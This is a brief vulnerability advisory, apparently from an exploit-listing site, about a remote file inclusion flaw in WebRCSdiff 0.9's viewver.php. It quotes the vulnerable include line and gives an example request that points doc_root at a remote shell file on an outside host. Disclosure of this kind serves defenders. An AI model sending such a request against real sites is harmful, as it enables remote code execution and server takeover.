WebRCSdiff 0.9 (viewver.php) Remote File Inclusion Vulnerability

2010.11.19

Credit: Fl0riX

Risk: High

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

========================================================
= Author: Fl0riX - Bug Researchers
 
= Application  Name : WebRCSdiff 0.9
 
= Vulnerable  Type: Remote File Inclusion
 
= Download: http://sourceforge.net/projects/webrcsdiff/files/webrcsdiff/0.9%20Release/webrcsdiff-0.9.tar.zip/download
 
= Risk : High
 
= Infection: Uzaktan Dosya Dahil edilebilir.
 
========================================================
 
=
 Error c0d3;
     include ("$doc_root/dir_config.php");
 
========================================================
 
=
 Example;
 site/viewver?doc_root=http://fl0rix/shell.txt?
========================================================

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

WebRCSdiff 0.9 (viewver.php) Remote File Inclusion Vulnerability

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.